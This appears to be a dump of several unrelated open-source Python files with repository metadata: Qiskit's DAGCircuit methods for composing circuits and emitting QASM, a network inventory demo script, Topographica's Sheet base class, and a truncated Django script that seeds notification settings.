self.add_creg(r[0], r[1])
self._check_wiremap_validity(wire_map, input_circuit.output_map,
self.input_map, input_circuit)
# Compose
self.basis = union_basis
self.gates = union_gates
ts = nx.topological_sort(input_circuit.multi_graph, reverse=True)
for n in ts:
nd = input_circuit.multi_graph.node[n]
if nd["type"] == "out":
# if in wire_map, get new name, else use existing name
m_name = wire_map.get(nd["name"], nd["name"])
# the mapped wire should already exist
assert m_name in self.input_map, \
"wire (%s,%d) not in self" % (m_name[0], m_name[1])
assert nd["name"] in input_circuit.wire_type, \
"inconsistent wire_type for (%s,%d) in input_circuit" \
% (nd["name"][0], nd["name"][1])
elif nd["type"] == "in":
# ignore input nodes
pass
elif nd["type"] == "op":
condition = self._map_condition(wire_map, nd["condition"])
self._check_condition(nd["name"], condition)
m_qargs = list(map(lambda x: wire_map.get(x, x), nd["qargs"]))
m_cargs = list(map(lambda x: wire_map.get(x, x), nd["cargs"]))
self.apply_operation_front(nd["name"], m_qargs, m_cargs,
nd["params"], condition)
else:
assert False, "bad node type %s" % nd["type"]
def size(self):
"""Return the number of operations."""
return self.multi_graph.order() - 2 * len(self.wire_type)
def depth(self):
"""Return the circuit depth."""
assert nx.is_directed_acyclic_graph(self.multi_graph), "not a DAG"
return nx.dag_longest_path_length(self.multi_graph) - 1
def width(self):
"""Return the total number of qubits used by the circuit."""
return len(self.wire_type) - self.num_cbits()
def num_cbits(self):
"""Return the total number of bits used by the circuit."""
return list(self.wire_type.values()).count(True)
def num_tensor_factors(self):
"""Compute how many components the circuit can decompose into."""
return nx.number_weakly_connected_components(self.multi_graph)
def _gate_string(self, name):
"""Return a QASM string for the named gate."""
out = ""
if self.gates[name]["opaque"]:
out = "opaque " + name
else:
out = "gate " + name
if self.gates[name]["n_args"] > 0:
out += "(" + ",".join(self.gates[name]["args"]) + ")"
out += " " + ",".join(self.gates[name]["bits"])
if self.gates[name]["opaque"]:
out += ";"
else:
out += "\n{\n" + self.gates[name]["body"].qasm() + "}"
return out
def qasm(self, decls_only=False, add_swap=False,
no_decls=False, qeflag=False, aliases=None):
"""Return a string containing QASM for this circuit.
if qeflag is True, add a line to include "qelib1.inc"
and only generate gate code for gates not in qelib1.
if no_decls is True, only print the instructions.
if aliases is not None, aliases contains a dict mapping
the current qubits in the circuit to new qubit names.
We will deduce the register names and sizes from aliases.
if decls_only is True, only print the declarations.
if add_swap is True, add the definition of swap in terms of
cx if necessary.
"""
# Rename qregs if necessary
if aliases:
qregdata = {}
for q in aliases.values():
if q[0] not in qregdata:
qregdata[q[0]] = q[1] + 1
elif qregdata[q[0]] < q[1] + 1:
qregdata[q[0]] = q[1] + 1
else:
qregdata = self.qregs
# Write top matter
if no_decls:
out = ""
else:
printed_gates = []
out = "OPENQASM 2.0;\n"
if qeflag:
out += "include \"qelib1.inc\";\n"
for k, v in sorted(qregdata.items()):
out += "qreg %s[%d];\n" % (k, v)
for k, v in sorted(self.cregs.items()):
out += "creg %s[%d];\n" % (k, v)
omit = ["U", "CX", "measure", "reset", "barrier"]
if qeflag:
qelib = ["u3", "u2", "u1", "cx", "id", "x", "y", "z", "h",
"s", "sdg", "t", "tdg", "cz", "cy", "ccx", "cu1",
"cu3"]
omit.extend(qelib)
printed_gates.extend(qelib)
for k in self.basis.keys():
if k not in omit:
if not self.gates[k]["opaque"]:
calls = self.gates[k]["body"].calls()
for c in calls:
if c not in printed_gates:
out += self._gate_string(c) + "\n"
printed_gates.append(c)
if k not in printed_gates:
out += self._gate_string(k) + "\n"
printed_gates.append(k)
if add_swap and not qeflag and "cx" not in self.basis:
out += "gate cx a,b { CX a,b; }\n"
if add_swap and "swap" not in self.basis:
out += "gate swap a,b { cx a,b; cx b,a; cx a,b; }\n"
# Write the instructions
if not decls_only:
ts = nx.topological_sort(self.multi_graph)
for n in ts:
nd = self.multi_graph.node[n]
if nd["type"] == "op":
if nd["condition"] is not None:
out += "if(%s==%d) " \
% (nd["condition"][0], nd["condition"][1])
if len(nd["cargs"]) == 0:
nm = nd["name"]
if aliases:
qarglist = map(lambda x: aliases[x], nd["qargs"])
else:
qarglist = nd["qargs"]
qarg = ",".join(map(lambda x: "%s[%d]" % (x[0], x[1]),
qarglist))
if len(nd["params"]) > 0:
param = ",".join(nd["params"])
out += "%s(%s) %s;\n" % (nm, param, qarg)
else:
out += "%s %s;\n" % (nm, qarg)
else:
if nd["name"] == "measure":
assert len(nd["cargs"]) == 1 and \
len(nd["qargs"]) == 1 and \
len(nd["params"]) == 0, "bad node data"
qname = nd["qargs"][0][0]
qindex = nd["qargs"][0][1]
if aliases:
newq = aliases[(qname, qindex)]
qname = newq[0]
qindex = newq[1]
out += "measure %s[%d] -> %s[%d];\n" \
% (qname,
qindex,
nd["cargs"][0][0],
nd["cargs"][0][1])
else:
assert False, "bad node data"
return out
def _check_wires_list(self, wires, name, input_circuit):
"""Check that a list of wires satisfies some conditions.
The wires give an order for (qu)bits in the input circuit
that is replacing the named operation.
- no duplicate names
- correct length for named operation
- elements are wires of input_circuit
Raises an exception otherwise.
"""
if len(set(wires)) != len(wires):
raise DAGCircuitError("duplicate wires")
wire_tot = self.basis[name][0] + self.basis[name][1]
if len(wires) != wire_tot:
raise DAGCircuitError("expected %d wires, got %d"
% (wire_tot, len(wires)))
for w in wires:
if w not in input_circuit.wire_type:
raise DAGCircuitError("wire (%s,%d) not in input circuit"
% (w[0], w[1]))
def _make_pred_succ_maps(self, n):
"""Return predecessor and successor dictionaries.
These map from wire names to predecessor and successor
nodes for the operation node n in self.multi_graph.
"""
pred_map = {e[2]['name']: e[0] for e in
self.multi_graph.in_edges_iter(nbunch=n, data=True)}
succ_map = {e[2]['name']: e[1] for e in
self.multi_graph.out_edges_iter(nbunch=n, data=True)}
return pred_map, succ_map
def _full_pred_succ_maps(self, pred_map, succ_map, input_circuit,
wire_map):
"""Map all wires of the input circuit.
Map all wires of the input circuit to predecessor and
successor nodes in self, keyed on wires in self.
pred_map, succ_map dicts come from _make_pred_succ_maps
input_circuit is the input circuit
wire_map is the wire map from wires of input_circuit to wires of self
returns full_pred_map, full_succ_map
"""
full_pred_map = {}
full_succ_map = {}
for w in input_circuit.input_map:
# If w is wire mapped, find the corresponding predecessor
# of the node
if w in wire_map:
full_pred_map[wire_map[w]] = pred_map[wire_map[w]]
full_succ_map[wire_map[w]] = succ_map[wire_map[w]]
else:
# Otherwise, use the corresponding output nodes of self
# and compute the predecessor.
full_succ_map[w] = self.output_map[w]
full_pred_map[w] = self.multi_graph.predecessors(self.output_map[w])[
0]
assert len(self.multi_graph.predecessors(self.output_map[w])) == 1,\
"too many predecessors for (%s,%d) output node" % (
w[0], w[1])
return full_pred_map, full_succ_map
def substitute_circuit_all(self, name, input_circuit, wires=[]):
"""Replace every occurrence of named operation with input_circuit."""
if name not in self.basis:
raise DAGCircuitError("%s is not in the list of basis operations"
% name)
self._check_wires_list(wires, name, input_circuit)
union_basis = self._make_union_basis(input_circuit)
union_gates = self._make_union_gates(input_circuit)
# Create a proxy wire_map to identify fragments and duplicates
# and determine what registers need to be added to self
proxy_map = {w: ("", 0) for w in wires}
add_qregs = self._check_wiremap_registers(proxy_map,
input_circuit.qregs,
{}, False)
for r in add_qregs:
self.add_qreg(r[0], r[1])
add_cregs = self._check_wiremap_registers(proxy_map,
input_circuit.cregs,
{}, False)
for r in add_cregs:
self.add_creg(r[0], r[1])
# Iterate through the nodes of self and replace the selected nodes
# by iterating through the input_circuit, constructing and
# checking the validity of the wire_map for each replacement
# NOTE: We do not replace conditioned gates. One way to implement
# this later is to add or update the conditions of each gate
# that we add from the input_circuit.
self.basis = union_basis
self.gates = union_gates
ts = nx.topological_sort(self.multi_graph)
for n in ts:
nd = self.multi_graph.node[n]
if nd["type"] == "op" and nd["name"] == name:
if nd["condition"] is None:
wire_map = {k: v for k, v in zip(wires,
[i for s in [nd["qargs"], nd["cargs"]]
for i in s])}
self._check_wiremap_validity(wire_map, wires,
self.input_map, input_circuit)
pred_map, succ_map = self._make_pred_succ_maps(n)
full_pred_map, full_succ_map = \
self._full_pred_succ_maps(pred_map, succ_map,
input_circuit, wire_map)
# Now that we know the connections, delete node
self.multi_graph.remove_node(n)
# Iterate over nodes of input_circuit
tsin = nx.topological_sort(input_circuit.multi_graph)
for m in tsin:
md = input_circuit.multi_graph.node[m]
if md["type"] == "op":
# Insert a new node
condition = self._map_condition(wire_map,
md["condition"])
m_qargs = list(map(lambda x: wire_map.get(x, x),
md["qargs"]))
m_cargs = list(map(lambda x: wire_map.get(x, x),
md["cargs"]))
self._add_op_node(md["name"], m_qargs, m_cargs,
md["params"], condition)
# Add edges from predecessor nodes to new node
# and update predecessor nodes that change
all_cbits = self._bits_in_condition(condition)
all_cbits.extend(m_cargs)
al = [m_qargs, all_cbits]
for q in itertools.chain(*al):
self.multi_graph.add_edge(full_pred_map[q],
self.node_counter, name=q)
full_pred_map[q] = copy.copy(self.node_counter)
# Connect all predecessors and successors, and remove
# residual edges between input and output nodes
for w in full_pred_map.keys():
self.multi_graph.add_edge(full_pred_map[w], full_succ_map[w],
name=w)
o_pred = self.multi_graph.predecessors(
self.output_map[w])
if len(o_pred) > 1:
assert len(o_pred) == 2, \
"expected 2 predecessors here"
p = list(filter(lambda x: x != full_pred_map[w],
o_pred))
assert len(p) == 1, \
"expected 1 predecessor to pass filter"
self.multi_graph.remove_edge(
p[0], self.output_map[w])
def substitute_circuit_one(self, node, input_circuit, wires=[]):
"""Replace one node with input_circuit.
node is a reference to a node of self.multi_graph of type "op"
input_circuit is a DAGCircuit
"""
nd = self.multi_graph.node[node]
# TODO: reuse common code in substitute_circuit_one and _all
name = nd["name"]
self._check_wires_list(wires, name, input_circuit)
union_basis = self._make_union_basis(input_circuit)
union_gates = self._make_union_gates(input_circuit)
# Create a proxy wire_map to identify fragments and duplicates
# and determine what registers need to be added to self
proxy_map = {w: ("", 0) for w in wires}
add_qregs = self._check_wiremap_registers(proxy_map,
input_circuit.qregs,
{}, False)
for r in add_qregs:
self.add_qreg(r[0], r[1])
add_cregs = self._check_wiremap_registers(proxy_map,
input_circuit.cregs,
{}, False)
for r in add_cregs:
self.add_creg(r[0], r[1])
# Replace the node by iterating through the input_circuit.
# Constructing and checking the validity of the wire_map.
# NOTE: We do not replace conditioned gates. One way to implement
# later is to add or update the conditions of each gate we add
# from the input_circuit.
self.basis = union_basis
self.gates = union_gates
if nd["type"] != "op":
raise DAGCircuitError("expected node type \"op\", got %s"
% nd["type"])
if nd["condition"] is None:
wire_map = {k: v for k, v in zip(wires,
[i for s in [nd["qargs"],
nd["cargs"]]
for i in s])}
self._check_wiremap_validity(wire_map, wires,
self.input_map, input_circuit)
pred_map, succ_map = self._make_pred_succ_maps(node)
full_pred_map, full_succ_map = \
self._full_pred_succ_maps(pred_map, succ_map,
input_circuit, wire_map)
# Now that we know the connections, delete node
self.multi_graph.remove_node(node)
# Iterate over nodes of input_circuit
tsin = nx.topological_sort(input_circuit.multi_graph)
for m in tsin:
md = input_circuit.multi_graph.node[m]
if md["type"] == "op":
# Insert a new node
condition = self._map_condition(wire_map, md["condition"])
m_qargs = list(map(lambda x: wire_map.get(x, x),
md["qargs"]))
m_cargs = list(map(lambda x: wire_map.get(x, x),
md["cargs"]))
self._add_op_node(md["name"], m_qargs, m_cargs,
md["params"], condition)
# Add edges from predecessor nodes to new node
# and update predecessor nodes that change
all_cbits = self._bits_in_condition(condition)
all_cbits.extend(m_cargs)
al = [m_qargs, all_cbits]
for q in itertools.chain(*al):
self.multi_graph.add_edge(full_pred_map[q], self.node_counter,
name=q)
full_pred_map[q] = copy.copy(self.node_counter)
# Connect all predecessors and successors, and remove
# residual edges between input and output nodes
for w in full_pred_map.keys():
self.multi_graph.add_edge(
full_pred_map[w], full_succ_map[w], name=w)
o_pred = self.multi_graph.predecessors(self.output_map[w])
if len(o_pred) > 1:
assert len(o_pred) == 2, "expected 2 predecessors here"
p = list(filter(lambda x: x != full_pred_map[w], o_pred))
assert len(p) == 1, "expected 1 predecessor to pass filter"
self.multi_graph.remove_edge(p[0], self.output_map[w])
def get_named_nodes(self, name):
"""Return a list of "op" nodes with the given name."""
nlist = []
if name not in self.basis:
raise DAGCircuitError("%s is not in the list of basis operations"
% name)
# Iterate through the nodes of self in topological order
ts = nx.topological_sort(self.multi_graph)
for n in ts:
nd = self.multi_graph.node[n]
if nd["type"] == "op" and nd["name"] == name:
nlist.append(n)
return nlist
def _remove_op_node(self, n):
"""Remove an operation node n.
Add edges from predecessors to successors.
"""
pred_map, succ_map = self._make_pred_succ_maps(n)
self.multi_graph.remove_node(n)
for w in pred_map.keys():
self.multi_graph.add_edge(pred_map[w], succ_map[w], name=w)
def remove_ancestors_of(self, node):
"""Remove all of the ancestor operation nodes of node."""
anc = nx.ancestors(self.multi_graph, node)
# TODO: probably better to do all at once using
# multi_graph.remove_nodes_from; same for related functions ...
for n in anc:
nd = self.multi_graph.node[n]
if nd["type"] == "op":
self._remove_op_node(n)
def remove_descendants_of(self, node):
"""Remove all of the descendant operation nodes of node."""
dec = nx.descendants(self.multi_graph, node)
for n in dec:
nd = self.multi_graph.node[n]
if nd["type"] == "op":
self._remove_op_node(n)
def remove_nonancestors_of(self, node):
"""Remove all of the non-ancestors operation nodes of node."""
anc = nx.ancestors(self.multi_graph, node)
comp = list(set(self.multi_graph.nodes()) - set(anc))
for n in comp:
nd = self.multi_graph.node[n]
if nd["type"] == "op":
self._remove_op_node(n)
def remove_nondescendants_of(self, node):
"""Remove all of the non-descendants operation nodes of node."""
dec = nx.descendants(self.multi_graph, node)
comp = list(set(self.multi_graph.nodes()) - set(dec))
for n in comp:
nd = self.multi_graph.node[n]
if nd["type"] == "op":
self._remove_op_node(n)
def layers(self):
"""Return a list of layers for all d layers of this circuit.
A layer is a circuit whose gates act on disjoint qubits, i.e.
a layer has depth 1. The total number of layers equals the
circuit depth d. The layers are indexed from 0 to d-1 with the
earliest layer at index 0. The layers are constructed using a
greedy algorithm. Each returned layer is a dict containing
{"graph": circuit graph, "partition": list of qubit lists}.
TODO: Gates that use the same cbits will end up in different
layers as this is currently implemented. This may not be
the desired behavior.
"""
layers_list = []
# node_map contains an input node or previous layer node for
# each wire in the circuit.
node_map = copy.deepcopy(self.input_map)
# wires_with_ops_remaining is a set of wire names that have
# operations we still need to assign to layers
wires_with_ops_remaining = set(self.input_map.keys())
while wires_with_ops_remaining:
# Create a new circuit graph and populate with regs and basis
new_layer = DAGCircuit()
for k, v in self.qregs.items():
new_layer.add_qreg(k, v)
for k, v in self.cregs.items():
new_layer.add_creg(k, v)
new_layer.basis = copy.deepcopy(self.basis)
new_layer.gates = copy.deepcopy(self.gates)
# Save the support of each operation we add to the layer
support_list = []
# Determine what operations to add in this layer
# ops_touched is a map from operation nodes touched in this
# iteration to the set of their unvisited input wires. When all
# of the inputs of a touched node are visited, the node is a
# foreground node we can add to the current layer.
ops_touched = {}
wires_loop = list(wires_with_ops_remaining)
emit = False
for w in wires_loop:
oe = list(filter(lambda x: x[2]["name"] == w,
self.multi_graph.out_edges(nbunch=[node_map[w]],
data=True)))
assert len(oe) == 1, "should only be one out-edge per (qu)bit"
nxt_nd_idx = oe[0][1]
nxt_nd = self.multi_graph.node[nxt_nd_idx]
# If we reach an output node, we are done with this wire.
if nxt_nd["type"] == "out":
wires_with_ops_remaining.remove(w)
# Otherwise, we are somewhere inside the circuit
elif nxt_nd["type"] == "op":
# Operation data
qa = copy.copy(nxt_nd["qargs"])
ca = copy.copy(nxt_nd["cargs"])
pa = copy.copy(nxt_nd["params"])
co = copy.copy(nxt_nd["condition"])
cob = self._bits_in_condition(co)
# First time we see an operation, add to ops_touched
if nxt_nd_idx not in ops_touched:
ops_touched[nxt_nd_idx] = set(qa) | set(ca) | set(cob)
# Mark inputs visited by deleting from set
# NOTE: expect trouble with if(c==1) measure q -> c;
assert w in ops_touched[nxt_nd_idx], "expected wire"
ops_touched[nxt_nd_idx].remove(w)
# Node becomes "foreground" if set becomes empty,
# i.e. every input is available for this operation
if not ops_touched[nxt_nd_idx]:
# Add node to new_layer
new_layer.apply_operation_back(nxt_nd["name"],
qa, ca, pa, co)
# Update node_map to point to this op
for v in itertools.chain(qa, ca, cob):
node_map[v] = nxt_nd_idx
# Add operation to partition
if nxt_nd["name"] != "barrier":
# support_list.append(list(set(qa) | set(ca) |
# set(cob)))
support_list.append(list(set(qa)))
emit = True
if emit:
l_dict = {"graph": new_layer, "partition": support_list}
layers_list.append(l_dict)
emit = False
else:
assert not wires_with_ops_remaining, "not finished but empty?"
return layers_list
def serial_layers(self):
"""Return a list of layers for all gates of this circuit.
A serial layer is a circuit with one gate. The layers have the
same structure as in layers().
"""
layers_list = []
ts = nx.topological_sort(self.multi_graph)
for n in ts:
nxt_nd = self.multi_graph.node[n]
if nxt_nd["type"] == "op":
new_layer = DAGCircuit()
for k, v in self.qregs.items():
new_layer.add_qreg(k, v)
for k, v in self.cregs.items():
new_layer.add_creg(k, v)
new_layer.basis = copy.deepcopy(self.basis)
new_layer.gates = copy.deepcopy(self.gates)
# Save the support of the operation we add to the layer
support_list = []
# Operation data
qa = copy.copy(nxt_nd["qargs"])
ca = copy.copy(nxt_nd["cargs"])
pa = copy.copy(nxt_nd["params"])
co = copy.copy(nxt_nd["condition"])
cob = self._bits_in_condition(co)
# Add node to new_layer
new_layer.apply_operation_back(nxt_nd["name"],
qa, ca, pa, co)
# Add operation to partition
if nxt_nd["name"] != "barrier":
# support_list.append(list(set(qa) | set(ca) | set(cob)))
support_list.append(list(set(qa)))
l_dict = {"graph": new_layer, "partition": support_list}
layers_list.append(l_dict)
return layers_list
def collect_runs(self, namelist):
"""Return a set of runs of "op" nodes with the given names.
For example, "... h q[0]; cx q[0],q[1]; cx q[0],q[1]; h q[1]; .."
would produce the tuple of cx nodes as an element of the set returned
from a call to collect_runs(["cx"]). If instead the cx nodes were
"cx q[0],q[1]; cx q[1],q[0];", the method would still return the
pair in a tuple. The namelist can contain names that are not
in the circuit's basis.
Nodes must have only one successor to continue the run.
"""
group_list = []
# Iterate through the nodes of self in topological order
# and form tuples containing sequences of gates
# on the same qubit(s).
ts = nx.topological_sort(self.multi_graph)
nodes_seen = dict(zip(ts, [False] * len(ts)))
for node in ts:
nd = self.multi_graph.node[node]
if nd["type"] == "op" and nd["name"] in namelist \
and not nodes_seen[node]:
group = [node]
nodes_seen[node] = True
s = self.multi_graph.successors(node)
while len(s) == 1 and \
self.multi_graph.node[s[0]]["type"] == "op" and \
self.multi_graph.node[s[0]]["name"] in namelist:
group.append(s[0])
nodes_seen[s[0]] = True
s = self.multi_graph.successors(s[0])
if len(group) > 1:
group_list.append(tuple(group))
return set(group_list)
def count_ops(self):
"""Count the occurrences of operation names.
Returns a dictionary of counts keyed on the operation name.
"""
op_dict = {}
ts = nx.topological_sort(self.multi_graph)
for node in ts:
nd = self.multi_graph.node[node]
name = nd["name"]
if nd["type"] == "op":
if name not in op_dict:
op_dict[name] = 1
else:
op_dict[name] += 1
return op_dict
def property_summary(self):
"""Return a dictionary of circuit properties."""
summary = {"size": self.size(),
"depth": self.depth(),
"width": self.width(),
"bits": self.num_cbits(),
"factors": self.num_tensor_factors(),
"operations": self.count_ops()}
return summary
| {
"content_hash": "af04033fdd471a0b9d72e789ae3bd51e",
"timestamp": "",
"source": "github",
"line_count": 1267,
"max_line_length": 91,
"avg_line_length": 45.4127861089187,
"alnum_prop": 0.5127741666377003,
"repo_name": "ChristopheVuillot/qiskit-sdk-py",
"id": "5a6770110654929ac4dc8d4d8c08d90a33c2af48",
"size": "58242",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "qiskit/dagcircuit/_dagcircuit.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "2582"
},
{
"name": "C++",
"bytes": "2273"
},
{
"name": "Makefile",
"bytes": "1834"
},
{
"name": "Python",
"bytes": "757305"
},
{
"name": "Shell",
"bytes": "4853"
}
],
"symlink_target": ""
} |
''' Sample usage of function 'inventory_summary' to print a list of the inventory, with the connected status and number
of Netconf capabilities.
Print the function's documentation then invoke the function and print the output.
The related function `inventory()` returns only the name of each network device.
To see more than just the name of the device use function `inventory_summary()`.
'''
from __future__ import print_function as _print_function
from pydoc import render_doc as doc
from pydoc import plain
from basics.inventory import inventory_summary, InventorySummary
from basics.render import print_table
# type_doc = plain(doc(InventorySummary))
def main():
print(plain(doc(inventory_summary)))
print('InventorySummary fields:', *InventorySummary._fields, sep='\n\t', end='\n\n')
print_table(inventory_summary())
if __name__ == "__main__":
main() | {
"content_hash": "f7280937eef6d240128c0ea8f001851f",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 120,
"avg_line_length": 39.21739130434783,
"alnum_prop": 0.7283813747228381,
"repo_name": "tbarrongh/cosc-learning-labs",
"id": "077b70251960d03d499b6d13b3de9f94d6b83537",
"size": "1505",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/learning_lab/01_inventory_summary.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "354065"
},
{
"name": "Shell",
"bytes": "2128"
}
],
"symlink_target": ""
} |
"""
Neural sheet objects and associated functions.
The Sheet class is the base class for EventProcessors that simulate
topographically mapped sheets of units (neurons or columns). A Sheet
is an EventProcessor that maintains a rectangular array of activity
values, and sends the contents of this array as the data element in
events.
The Sheet itself is a SheetCoordinateSystem, so that units may be
accessed by sheet or matrix coordinates. In general, however, sheets
should be thought of as having arbitrary density and sheet coordinates
should be used wherever possible, except when the code needs direct
access to a specific unit. By adhering to this convention, one should
be able to write and debug a simulation at a low density, and then
scale it up to run at higher densities (or down for lower densities)
simply by changing e.g. Sheet.nominal_density.
$Id$
"""
__version__ = '$Revision$'
from numpy import zeros,array,arange,meshgrid
from numpy import float64
import param
from simulation import EventProcessor
from sheetcoords import SheetCoordinateSystem
from boundingregion import BoundingBox, BoundingRegionParameter
from functionfamily import TransferFn
activity_type = float64
# (disable W0223 because input_event is deliberately still not implemented)
class Sheet(EventProcessor,SheetCoordinateSystem): # pylint: disable-msg=W0223
"""
The generic base class for neural sheets.
See SheetCoordinateSystem for how Sheet represents space, and
EventProcessor for how Sheet handles time.
output_fns are functions that take an activity matrix and produce
an identically shaped output matrix. The default is having no
output_fns.
"""
__abstract = True
nominal_bounds = BoundingRegionParameter(BoundingBox(radius=0.5),constant=True,doc="""
User-specified BoundingBox of the Sheet coordinate area
covered by this Sheet. The left and right bounds--if
specified--will always be observed, but the top and bottom
bounds may be adjusted to ensure the density in the y
direction is the same as the density in the x direction.
In such a case, the top and bottom bounds are adjusted
so that the center y point remains the same, and each
bound is as close as possible to its specified value. The
actual value of this Parameter is not adjusted, but the
true bounds may be found from the 'bounds' attribute
of this object.
""")
nominal_density = param.Number(default=10,constant=True,doc="""
User-specified number of processing units per 1.0 distance
horizontally or vertically in Sheet coordinates. The actual
number may be different because of discretization; the matrix
needs to tile the plane exactly, and for that to work the
density might need to be adjusted. For instance, an area of 3x2
cannot have a density of 2 in each direction. The true density
may be obtained from either the xdensity or ydensity attribute
(since these are identical for a Sheet).
""")
plastic = param.Boolean(True,doc="""
Setting this to False tells the Sheet not to change its
permanent state (e.g. any connection weights) based on
incoming events.
""")
precedence = param.Number(default = 0.1, softbounds=(0.0,1.0),doc="""
Allows a sorting order for Sheets, e.g. in the GUI.""")
row_precedence = param.Number(default = 0.5, softbounds=(0.0,1.0),doc="""
Allows grouping of Sheets before sorting precedence is
applied, e.g. for two-dimensional plots in the GUI.""")
layout_location = param.NumericTuple(default = (-1,-1),precedence=-1,doc="""
Location for this Sheet in an arbitrary pixel-based space
in which Sheets can be laid out for visualization.""")
output_fns = param.HookList(default=[],class_=TransferFn,
doc="Output function(s) to apply (if apply_output_fns is true) to this Sheet's activity.")
apply_output_fns=param.Boolean(default=True,
doc="Whether to apply the output_fn after computing an Activity matrix.")
def _get_density(self):
return self.xdensity
density = property(_get_density,doc="""The sheet's true density (i.e. the xdensity, which is equal to the ydensity for a Sheet.)""")
def __init__(self,**params):
"""
Initialize this object as an EventProcessor, then also as
a SheetCoordinateSystem with equal xdensity and ydensity.
sheet_views is a dictionary that stores SheetViews,
i.e. representations of the sheet for use by analysis or plotting
code.
"""
EventProcessor.__init__(self,**params)
# Initialize this object as a SheetCoordinateSystem, with
# the same density along y as along x.
SheetCoordinateSystem.__init__(self,self.nominal_bounds,self.nominal_density)
n_units = round((self.lbrt[2]-self.lbrt[0])*self.xdensity,0)
if n_units<1: raise ValueError(
"Sheet bounds and density must be specified such that the "+ \
"sheet has at least one unit in each direction; " \
+self.name+ " does not.")
# setup the activity matrix
self.activity = zeros(self.shape,activity_type)
# For non-plastic inputs
self.__saved_activity = []
self._plasticity_setting_stack = []
self.sheet_views = {}
### JABALERT: This should be deleted now that sheet_views is public
### JC: shouldn't we keep that, or at least write a function in
### utils that deletes a value in a dictinnary without returning an
### error if the key is not in the dict? I leave for the moment,
### and have to ask Jim to advise.
def release_sheet_view(self,view_name):
"""
Delete the dictionary entry with key entry 'view_name' to save
memory.
"""
if self.sheet_views.has_key(view_name):
del self.sheet_views[view_name]
# CB: what to call this? sheetcoords()? sheetcoords_of_grid()? idxsheetcoords()?
def sheetcoords_of_idx_grid(self):
"""
Return an array of x-coordinates and an array of y-coordinates
corresponding to the activity matrix of the sheet.
"""
nrows,ncols=self.activity.shape
C,R = meshgrid(arange(ncols),
arange(nrows))
X,Y = self.matrixidx2sheet(R,C)
return X,Y
# CB: check whether we need this function any more.
def row_col_sheetcoords(self):
"""
Return an array of Y-coordinates corresponding to the rows of
the activity matrix of the sheet, and an array of
X-coordinates corresponding to the columns.
"""
# The row and column centers are returned in matrix (not
# sheet) order (hence the reversals below).
nrows,ncols = self.activity.shape
return self.matrixidx2sheet(arange(nrows-1,-1,-1),arange(ncols))[::-1]
# CBALERT: to be removed once other code uses
# row_col_sheetcoords() or sheetcoords_of_idx_grid().
def sheet_rows(self):
return self.row_col_sheetcoords()[0]
def sheet_cols(self):
return self.row_col_sheetcoords()[1]
# CEBALERT: haven't really thought about what to put in this. The
# way it is now, subclasses could make a super.activate() call to
# avoid repeating some stuff.
def activate(self):
"""
Collect activity from each projection, combine it to calculate
the activity for this sheet, and send the result out.
Subclasses will need to override this method to whatever it
means to calculate activity in that subclass.
"""
if self.apply_output_fns:
for of in self.output_fns:
of(self.activity)
self.send_output(src_port='Activity',data=self.activity)
def state_push(self):
"""
Save the current state of this sheet to an internal stack.
This method is used by operations that need to test the
response of the sheet without permanently altering its state,
e.g. for measuring maps or probing the current behavior
non-invasively. By default, only the activity pattern of this
sheet is saved, but subclasses should add saving for any
additional state that they maintain, or strange bugs are
likely to occur. The state can be restored using state_pop().
Note that Sheets that do learning need not save the
values of all connection weights, if any, because
plasticity can be turned off explicitly. Thus this method
is intended only for shorter-term state.
"""
self.__saved_activity.append(array(self.activity))
EventProcessor.state_push(self)
for of in self.output_fns:
if hasattr(of,'state_push'):
of.state_push()
def state_pop(self):
"""
Pop the most recently saved state off the stack.
See state_push() for more details.
"""
self.activity = self.__saved_activity.pop()
EventProcessor.state_pop(self)
for of in self.output_fns:
if hasattr(of,'state_pop'):
of.state_pop()
def activity_len(self):
"""Return the number of items that have been saved by state_push()."""
return len(self.__saved_activity)
def override_plasticity_state(self, new_plasticity_state):
"""
Temporarily override plasticity of medium and long term internal state.
This function should be implemented by all subclasses so that
it preserves the ability of the Sheet to compute activity,
i.e. to operate over a short time scale, while preventing any
lasting changes to the state (if new_plasticity_state=False).
Any operation that does not have any lasting state, such as
those affecting only the current activity level, should not
be affected by this call.
By default, simply saves a copy of the plastic flag to an
internal stack (so that it can be restored by
restore_plasticity_state()), and then sets plastic to
new_plasticity_state.
"""
self._plasticity_setting_stack.append(self.plastic)
self.plastic=new_plasticity_state
def restore_plasticity_state(self):
"""
Restores plasticity of medium and long term internal state after
a override_plasticity_state call.
This function should be implemented by all subclasses to
remove the effect of the most recent override_plasticity_state call,
i.e. to restore plasticity of any type that was overridden.
"""
self.plastic = self._plasticity_setting_stack.pop()
def n_bytes(self):
"""
Return a lower bound for the memory taken by this sheet, in bytes.
Typically, this number will include the activity array and any
similar arrays, plus any other significant data owned (in some
sense) by this Sheet. It will not usually include memory
taken by the Python dictionary or various "housekeeping"
attributes, which usually contribute only a small amount to
the memory requirements.
Subclasses should reimplement this method if they store a
significant amount of data other than in the activity array.
"""
return self.activity.nbytes
| {
"content_hash": "3bb470af0b81f4aa6f9d9072ee3c4477",
"timestamp": "",
"source": "github",
"line_count": 296,
"max_line_length": 136,
"avg_line_length": 39.442567567567565,
"alnum_prop": 0.6613276231263383,
"repo_name": "jesuscript/topo-mpi",
"id": "290c894989cbb1a624925cba9517b665527f55b2",
"size": "11675",
"binary": false,
"copies": "1",
"ref": "refs/heads/cleanmpi",
"path": "topo/base/sheet.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "28864"
},
{
"name": "Emacs Lisp",
"bytes": "21378"
},
{
"name": "PHP",
"bytes": "552321"
},
{
"name": "Perl",
"bytes": "32843"
},
{
"name": "Python",
"bytes": "3076894"
},
{
"name": "Shell",
"bytes": "4230"
},
{
"name": "Tcl",
"bytes": "433956"
}
],
"symlink_target": ""
} |
import random
from django.contrib.auth.models import User
from notification.models import NoticeType, NoticeSetting, ObservedItem
def generate():
for user in User.objects.all():
for notice_type in NoticeType.objects.all():
en = random.random() <= 0.1
notice_setting = NoticeSetting.objects.create(
user=user,
notice_type=notice_type,
medium="1",
send=en
)
print "%sabled notices for %s on %s" % (en and 'En' or 'Dis',
user, notice_type)
if __name__ == '__main__':
generate() | {
"content_hash": "8dad6d692e53b21ebb680787ab5d0834",
